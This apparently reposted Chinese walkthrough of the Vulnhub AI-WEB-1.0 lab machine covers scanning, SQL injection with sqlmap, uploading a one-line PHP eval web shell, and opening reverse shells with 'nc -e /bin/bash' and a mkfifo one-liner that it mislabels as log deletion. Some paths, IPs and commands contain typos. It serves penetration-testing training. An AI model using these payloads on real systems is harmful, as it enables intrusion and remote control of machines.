当前位置: 首页 > news >正文

Vulnhub靶机:AI-WEB-1.0渗透骚操作(超详细讲解教程)

# 环境准备
AI-WEB-1.0靶机(192.168.110.36)
//靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/
kali-linux攻击机(192.168.110.72)
# 本次实验使用的是桥接模式,建议大家使用net模式,不然上手难度会提升

主机发现+端口扫描

# 我们使用arp-scan和namp来探测主机信息
arp-scan -l
nmap 192.168.110.0/24 --min-rate=1000

# 发现80端口,然后ping一下,ping通了,我们访问页面看一下有什么东西 

 

 

目录扫描

# 发现页面没有什么有价值的,那么我们就用dirsearch和dirb进行目录扫描
dirseach-u http://192.168.110.36
dirb http://192.168.110.36

 

 

 # 发现有一个robots.txt文件,其他目录什么都没有,然后对其继续扫描

# 扫描出来发现有个php后缀的目录,先留着等候 

# 扫描se3reTdir777目录,然后发现有一个留言框

发现SQL注入

# 发现页面有sql注入,那么接下来我们就要对他进行抓包处理

# 我们将抓取的数据包存放在1.txt中,使用sqlmap抓取数据库信息
python3 sqlmap.py -r F:\tools\PentestTools\Tools\VulnerabilityExploitation\sqlmap\1.txt -dbs

# 查询到数据库中表的信息
python3 sqlmap.py -r F:\tools\PentestTools\Tools\VulnerabilityExploitation\sqlmap\1.txt -dbs -D aiweb1 --tables

# 查询到user表中字段信息
python3 sqlmap.py -r F:\tools\PentestTools\Tools\VulnerabilityExploitation\sqlmap\1.txt -dbs -D aiweb1 -T user --columns

# 好像没有我们需要的信息,所以我们从kali攻击机中拿取shell
sqlmap -u "http://192.168.110.72/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --os-shell

获取靶机shell

# 拿到shell后,我们制作一句话木马,在文件中传入命名为1.php
<?php @eval($_POST['zx'])?>

# 将木马传入AI-WEB-1.0靶机中
qlmap -u "http://192.168.110.72/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

开启服务

# 开启http服务
python -m http.server 7999

# 登录kali网页服务,查看是否存在1.php
http://192.168.110.28:7999/

使用中国蚁剑连接

开启监听端口

# nc反弹连接,不需要再上传文件进行反弹
在kali nc 7777
-l 监听模式,用于入站连接
-v 详细输出--用两个-v可得到更详细的内容
-v 详细输出--用两个-v可得到更详细的内容
# 如果7777无法监听,则可以换端口进行监听,这一步提权不稳定,可多次尝试
nc -lvvp 7777
cd /home/www/html/web1x443290o2adf92213/ae3reTdir777/upload/
nc -e /bin/bash 192.168.110.28 7777

# 删除日志
rm /tmp/z;mkfifo/tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.110.139 7777 > /tmp/z

 好小子,离成功又近一步!!!!!

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 记录阿里云部署gitlab
  • 全开源TikTok跨境商城源码/TikTok内嵌商城+搭建教程/前端uniapp+后端
  • Framework源码整编、单编、烧录过程
  • 科研绘图系列:R语言山脊图(Ridgeline Chart)
  • js实现函数柯里化
  • C++复习的长文指南(二)
  • 智慧矿山 | 选矿工艺可视化
  • 论文中的流程图参考图片
  • ADI - 通过5 V至24 V输入提供双极性、双向DC-DC流入和流出电流
  • JavaScript之typeof运算符
  • [PM]面试题-综合问题
  • 什么情况?我代码没了
  • 《基于FPGA的数字信号处理》专栏的导航与说明
  • MySQL update set语句中 逗号与and的区别
  • 配置第三方软件仓库
  • JS中 map, filter, some, every, forEach, for in, for of 用法总结
  • 【402天】跃迁之路——程序员高效学习方法论探索系列(实验阶段159-2018.03.14)...
  • CODING 缺陷管理功能正式开始公测
  • Django 博客开发教程 8 - 博客文章详情页
  • dva中组件的懒加载
  • git 常用命令
  • IIS 10 PHP CGI 设置 PHP_INI_SCAN_DIR
  • iOS帅气加载动画、通知视图、红包助手、引导页、导航栏、朋友圈、小游戏等效果源码...
  • Python socket服务器端、客户端传送信息
  • vue-cli在webpack的配置文件探究
  • 产品三维模型在线预览
  • 开源SQL-on-Hadoop系统一览
  • 快速构建spring-cloud+sleuth+rabbit+ zipkin+es+kibana+grafana日志跟踪平台
  • 蓝海存储开关机注意事项总结
  • 罗辑思维在全链路压测方面的实践和工作笔记
  • 前端每日实战:61# 视频演示如何用纯 CSS 创作一只咖啡壶
  • 前端每日实战:70# 视频演示如何用纯 CSS 创作一只徘徊的果冻怪兽
  • 前端面试之闭包
  • 前嗅ForeSpider教程:创建模板
  • 如何使用 OAuth 2.0 将 LinkedIn 集成入 iOS 应用
  • 软件开发学习的5大技巧,你知道吗?
  • 验证码识别技术——15分钟带你突破各种复杂不定长验证码
  • 2017年360最后一道编程题
  • ionic异常记录
  • 如何正确理解,内页权重高于首页?
  • # C++之functional库用法整理
  • # 利刃出鞘_Tomcat 核心原理解析(七)
  • #{} 和 ${}区别
  • #{}和${}的区别是什么 -- java面试
  • #我与Java虚拟机的故事#连载03:面试过的百度,滴滴,快手都问了这些问题
  • (13)Latex:基于ΤΕΧ的自动排版系统——写论文必备
  • (2022 CVPR) Unbiased Teacher v2
  • (附源码)springboot教学评价 毕业设计 641310
  • (六)Flink 窗口计算
  • (三)SvelteKit教程:layout 文件
  • (实战)静默dbca安装创建数据库 --参数说明+举例
  • (四)Controller接口控制器详解(三)
  • (已解决)报错:Could not load the Qt platform plugin “xcb“
  • (转)ObjectiveC 深浅拷贝学习
  • (转)平衡树